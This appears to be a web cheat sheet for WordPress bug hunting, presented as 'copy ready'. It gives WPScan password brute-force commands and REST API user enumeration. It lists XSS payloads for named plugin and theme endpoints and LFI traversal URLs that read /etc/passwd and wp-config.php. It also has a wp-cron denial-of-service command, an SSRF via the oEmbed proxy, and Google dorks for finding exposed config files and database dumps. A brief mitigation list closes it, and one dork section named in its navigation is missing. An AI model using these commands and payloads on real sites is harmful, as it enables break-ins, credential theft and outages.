Mastering WordPress

Comprehensive guide to WordPress bug hunting, from architecture understanding to advanced exploitation techniques.

30+ Techniques11 Dork CategoriesCopy Ready

Phase 0

Understanding WordPress Architecture

1Core WordPress files - rarely the target

Core: Main WordPress files maintained by the community

2Themes can contain vulnerabilities

Themes: Control design but often include PHP/JS code

3Attackers usually target plugins, not core

Plugins: Extend functionality but biggest source of vulnerabilities

4Key insight for bug hunters

Attackers don't target WordPress core - they exploit poorly coded plugins or misconfigured themes

Phase 1

WordPress File/Folder Hierarchy

1Typical WordPress directory structure

/ (webroot)
├─ index.php              # Loads WordPress environment
├─ license.txt            # WordPress GPL license
├─ readme.html            # Basic info about WP installation
├─ wp-config.php          # Main configuration (DB, keys, salts)
├─ wp-login.php           # User login & authentication
├─ xmlrpc.php             # XML-RPC API endpoint
├─ wp-admin/              # WordPress admin dashboard core
├─ wp-includes/           # Core WordPress libraries & functions
└─ wp-content/            # User content (safe to edit)
   ├─ plugins/            # Installed plugins
   ├─ themes/             # Installed themes
   ├─ uploads/             # Media library (user uploaded files)
   ├─ languages/           # Translation files
   ├─ mu-plugins/          # Must-use plugins (auto-loaded)
   ├─ cache/               # Cache files
   └─ upgrade/             # Temporary files during updates

Tool 2

Essential Tools 1: WPScan

1Basic WPScan with API token for vulnerability data

wpscan --url https://domain.com --api-token YOUR_TOKEN

2Aggressive scan: all themes, all plugins, users

wpscan --url https://domain.com --disable-tls-checks --api-token <here> -e at -e ap -e u --enumerate ap --plugins-detection aggressive --force

Tool 3

Essential Tools 2: Nmap

1Discover open ports and services

nmap -p- --min-rate 1000 -T4 -A target.com -oA fullscan

Tool 4

Essential Tools 3: DirBuster/ffuf

1Find hidden directories with dirsearch

dirsearch -u https://example.com --full-url --deep-recursive -r

2Comprehensive dirsearch with all extensions

dirsearch -u https://example.com -e php,cgi,htm,html,shtm,shtml,js,txt,bak,zip,old,conf,log,pl,asp,aspx,jsp,sql,db,sqlite,mdb,tar,gz,7z,rar,json,xml,yml,yaml,ini,java,py,rb,php3,php4,php5 --random-agent --recursive -R 3 -t 20 --exclude-status=404 --follow-redirects --delay=0.1

3Comprehensive ffuf directory bruteforce

ffuf -w seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u https://example.com/FUZZ -fc 400,401,402,403,404,429,500,501,502,503 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf,.js,.css,.zip,.bak,.old,.log,.json,.xml,.config,.env,.asp,.aspx,.jsp,.gz,.tar,.sql,.db -ac -c -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" -t 100 -r -o results.json

4Fuzz with CoffinXP WordPress wordlist

ffuf -w @coffin-payloads/coffin@wp-fuzz.txt -u https://target.com/FUZZ -fc 401,403,404 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf -ac -H "User-Agent: Mozilla/5.0" -r -t 60 --rate 100 -c

5CoffinXP WordPress fuzzing wordlist

https://github.com/coffinxp/payloads/blob/main/coffin@wp-fuzz.txt

Enum 5

Username Enumeration via REST API

1#1 Default REST API endpoint to list users

/wp-json/wp/v2/users

2#2 Direct user ID probing (start with 1)

/wp-json/wp/v2/users/1

3#3 Continue enumerating user IDs

/wp-json/wp/v2/users/2

4#4 Bypass with rest_route parameter

/wp-json/?rest_route=/wp/v2/users/

5#5 Bypass via index.php

/index.php?rest_route=/wp/v2/users

6#6 Paginated user listing

/wp-json/wp/v2/users?page=1

7#7 Search for specific username

/wp-json/wp/v2/users?search=admin

8#8 Alternative endpoint (older WP versions)

/wp-json/users

Brute 6

Admin Panel Password Bruteforce

1#1 WPScan brute force with single username

wpscan --url https://target.com --username admin --passwords /path/to/passwords.txt --disable-tls-checks

2#2 WPScan brute force with multiple usernames

wpscan --url https://target.com --usernames /path/to/usernames.txt --passwords /path/to/passwords.txt --disable-tls-checks

3#3 WPScan brute force via XML-RPC

wpscan --url https://target.com --usernames admin --passwords /path/to/passwords.txt --disable-tls-checks --max-threads 10

Exposed 7

Exposed 1: Configuration Files

1#1 Main WordPress configuration file

/wp-config.php

2#2 Backup of config file

/wp-config.php.bak

3#3 Saved version

/wp-config.php.save

4#4 Old version

/wp-config.php.old

5#5 Original version

/wp-config.php.orig

6#6 Tilde backup (Linux)

/wp-config.php~

7#7 Exposed as text file

/wp-config.php.txt

8#8 Compressed config

/wp-config.php.zip

Exposed 8

Exposed 2: Environment Files

1#1 Environment variables file

/.env

2#2 Env backup

/.env.bak

3#3 Env old version

/.env.old

4#4 Env saved version

/.env.save

5#5 Example env file

/.env.example

6#6 Local env file

/.env.local

Exposed 9

Exposed 3: Backup & Archive Files

1#1 Site backup archive

/backup.zip

2#2 Compressed tar backup

/backup.tar.gz

3#3 Database dump

/db.sql

4#4 Database export

/database.sql

5#5 SQL dump file

/dump.sql

6#6 Full WordPress archive

/wordpress.zip

Exposed 10

Exposed Registration Page

1If registration enabled, attackers can create accounts without restrictions

/wp-login.php?action=register

2Nuclei template to detect registration page

id: wp-login-register-detect
info:
  name: Detect WordPress Registration Page
  author: yourname
  severity: info
  description: Checks for WordPress user registration endpoint exposure
requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-login.php?action=register"
    matchers:
      - type: word
        words:
          - 'user_login'
          - 'user_email'
        condition: and
      - type: status
        status:
          - 200

Setup 11

Unsecured WordPress Setup Wizard

1WordPress setup wizard - can expose DB config form

/wp-admin/setup-config.php?step=1

2Nuclei template for setup config detection

https://github.com/coffinxp/nuclei-templates/blob/main/wp-setup-config.yaml

Exploit 12

Exploiting 1: Admin-AJAX XSS

1#1 XSS via admin-ajax.php with unescaped options

domain.com/wp-admin/admin-ajax.php?action=tie_get_user_weather&options={'location':'Cairo','units':'C','forecast_days':'5</script><script>alert(document.domain)</script>custom_name':'Cairo','animated':'true'}

2#2 XSS via theme thumb.php with src parameter

domain.com/wp-content/themes/ambience/thumb.php?src=<body onload=prompt(1)>.png

Exploit 13

Exploiting 2: RCE & LFI

1#1 LFI via mail-masta plugin

https://domain.com/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

2#2 LFI basic attempt

http://target.com/index.php?page=about.php

3#3 LFI with path traversal

http://target.com/index.php?page=../../../../etc/passwd

4#4 LFI targeting wp-config.php via theme

http://target.com/wp-content/themes/twentytwenty/page.php?file=../../../../wp-config.php

5#5 LFI via plugin download function

http://target.com/wp-content/plugins/plugin-name/download.php?file=../../../../wp-config.php

6CoffinXP LFI payload wordlist

https://github.com/coffinxp/payloads/blob/main/lfi.txt

DoS 14

Abusing wp-cron.php for Denial of Service

1DoS via wp-cron.php (causes high server load)

./doser -t 100000 -g "https://target.com/wp-cron.php"

2How to confirm the DoS vulnerability

return a 500 Internal Server Error upon refresh, the DoS issue is confirmed

3Go-based DoS tool for WordPress

https://github.com/Quitten/doser.go

Exposed 15

Exposed WordPress Debug Log

1Debug log may expose sensitive PHP errors and paths

https://target.com/wp-content/debug.log

Install 16

WordPress Installation Script

1If accessible, attackers can reinstall WordPress with their own DB credentials

https://target.com/wp-admin/install.php

SSRF 17

WordPress SSRF

1SSRF via oEmbed proxy endpoint

https://target.com/wp-json/oembed/1.0/proxy?url=<attacker-controlled-url>

2Potential SSRF impacts

Impact: Internal network scanning, accessing cloud metadata (AWS/GCP), leaking sensitive data from internal services

3Nuclei template for WordPress takeover/SSRF

https://github.com/coffinxp/nuclei-templates/blob/main/wordpress-takeover.yaml

Dir 18

Directory Listing Enabled

1#1 May reveal media assets, documents, or user uploads

https://target.com/wp-content/uploads/

2#2 Could expose plugin files, outdated versions, or config details

https://target.com/wp-content/plugins/

3#3 May allow attackers to inspect theme files, templates

https://target.com/wp-content/themes/

4#4 Often exposes core PHP files and scripts

https://target.com/wp-includes/

5#5 May leak archived site data or database exports

https://target.com/wp-content/backup/

6#6 Backups in admin directories can be discovered

https://target.com/wp-admin/backup/

Dork 19

Google Dorks 1: Finding WordPress Sites

1#1 Find WordPress sites by wp-content path

site:target.com inurl:wp-content

2#2 Find WordPress admin panels

site:target.com inurl:wp-admin

3#3 Find by WordPress footer text

site:target.com "Powered by WordPress"

Dork 20

Google Dorks 2: Version Detection

1#1 Find readme.html for version info

inurl:readme.html "WordPress"

2#2 Find by embed script (version in file)

inurl:/wp-includes/js/wp-embed.min.js

3#3 Search for version mentions

site:target.com "WordPress" "version"

Dork 21

Google Dorks 3: Vulnerable Plugins

1#1 Find specific plugin paths

inurl:wp-content/plugins/plugin-name

2#2 Find plugins with directory listing enabled

site:target.com inurl:wp-content/plugins "index of"

3#3 Find sites using vulnerable plugins

site:target.com "wp-content/plugins" + "vulnerable-plugin-name"

Dork 22

Google Dorks 4: Vulnerable Themes

1#1 Find specific theme paths

inurl:wp-content/themes/theme-name

2#2 Find themes with directory listing

site:target.com inurl:wp-content/themes "index of"

3#3 Find sites using vulnerable themes

site:target.com "wp-content/themes" + "vulnerable-theme-name"

Dork 24

Google Dorks 6: Config Files

1#1 Find exposed wp-config.php

inurl:wp-config.php

2#2 Find config mentions in text files

site:target.com ext:txt "wp-config"

3#3 Find WordPress mentions in log files

site:target.com ext:log "wordpress"

Dork 25

Google Dorks 7: Backup Files

1#1 Find backup.zip in wp-content

inurl:wp-content backup.zip

2#2 Find SQL dumps mentioning WordPress

site:target.com ext:sql "wordpress"

3#3 Find .bak files with wp-config

site:target.com ext:bak "wp-config"

Dork 26

Google Dorks 8: Database Dumps

1#1 Find SQL dumps with wp_users table

site:target.com ext:sql "INSERT INTO wp_users"

2#2 Find database dump mentions

site:target.com "database dump" "wordpress"

Dork 27

Google Dorks 9: Error Messages

1#1 Find fatal errors mentioning WordPress

site:target.com "Fatal error" "wordpress"

2#2 Find database errors

site:target.com "WordPress database error"

Dork 28

Google Dorks 10: Sensitive Information

1#1 Find open directory listing for wp-admin

site:target.com Index of /wp-admin

2#2 Find uploads directory listing

site:target.com "index of" /wp-content/uploads/

3#3 Find REST API user endpoint

site:target.com inurl:wp-json/wp/v2/users

4#4 Find XML-RPC endpoint

site:target.com "xmlrpc.php"

Dork 29

Google Dorks 11: Directory Listings

1#1 Find wp-includes directory listing

site:target.com intitle:"index of" wp-includes

2#2 Find wp-content directory listing

site:target.com intitle:"index of" wp-content

Dork 30

Google Dorks Reference

1WPScan WordPress vulnerability database

https://wpscan.com/wordpresses/

Defense 31

Prevention and Mitigation

1Regularly patching reduces exposure to known CVEs and zero-days

#1: Keep WordPress, Plugins & Themes Updated

2Every plugin is an extra attack surface - delete what you don't use

#2: Remove Unused Plugins & Themes

3Block public access to /wp-config.php, .env, .htaccess, /xmlrpc.php, /wp-admin/, /wp-cron.php

#3: Limit Access to Sensitive Files & Endpoints

4Use strong, unique passwords and enable 2FA for all admin accounts

#4: Enforce Strong Authentication

5Protect against brute force, XML-RPC abuse, and DoS with rate limiting or WAF (Cloudflare, ModSecurity)

#5: Rate Limiting & WAF

6Ensure backups are stored outside web root and not publicly accessible

#6: Secure Backups

7Regularly audit DNS records to prevent subdomain takeover risks

#7: Subdomain & DNS Hygiene

Tools

Tools & Resources

WPScan

Gold standard for WordPress enumeration (plugins, themes, users, vulnerabilities)

Nuclei Templates

CoffinXP Nuclei templates for WordPress vulnerabilities

CoffinXP Payloads

WordPress fuzzing wordlists and LFI payloads

WPScan Vulnerability DB

Official WordPress vulnerability database

DoSer Tool

Go-based DoS tool for WordPress wp-cron.php

Mastering WordPress

Understanding WordPress Architecture

WordPress File/Folder Hierarchy

Essential Tools 1: WPScan

Essential Tools 2: Nmap

Essential Tools 3: DirBuster/ffuf

Username Enumeration via REST API

Admin Panel Password Bruteforce

Exposed 1: Configuration Files

Exposed 2: Environment Files

Exposed 3: Backup & Archive Files

Exposed Registration Page

Unsecured WordPress Setup Wizard

Exploiting 1: Admin-AJAX XSS

Exploiting 2: RCE & LFI

Abusing wp-cron.php for Denial of Service

Exposed WordPress Debug Log

WordPress Installation Script

WordPress SSRF

Directory Listing Enabled

Google Dorks 1: Finding WordPress Sites

Google Dorks 2: Version Detection

Google Dorks 3: Vulnerable Plugins

Google Dorks 4: Vulnerable Themes

Google Dorks 5: Login Pages

Google Dorks 6: Config Files

Google Dorks 7: Backup Files

Google Dorks 8: Database Dumps

Google Dorks 9: Error Messages

Google Dorks 10: Sensitive Information

Google Dorks 11: Directory Listings

Google Dorks Reference

Prevention and Mitigation

Tools & Resources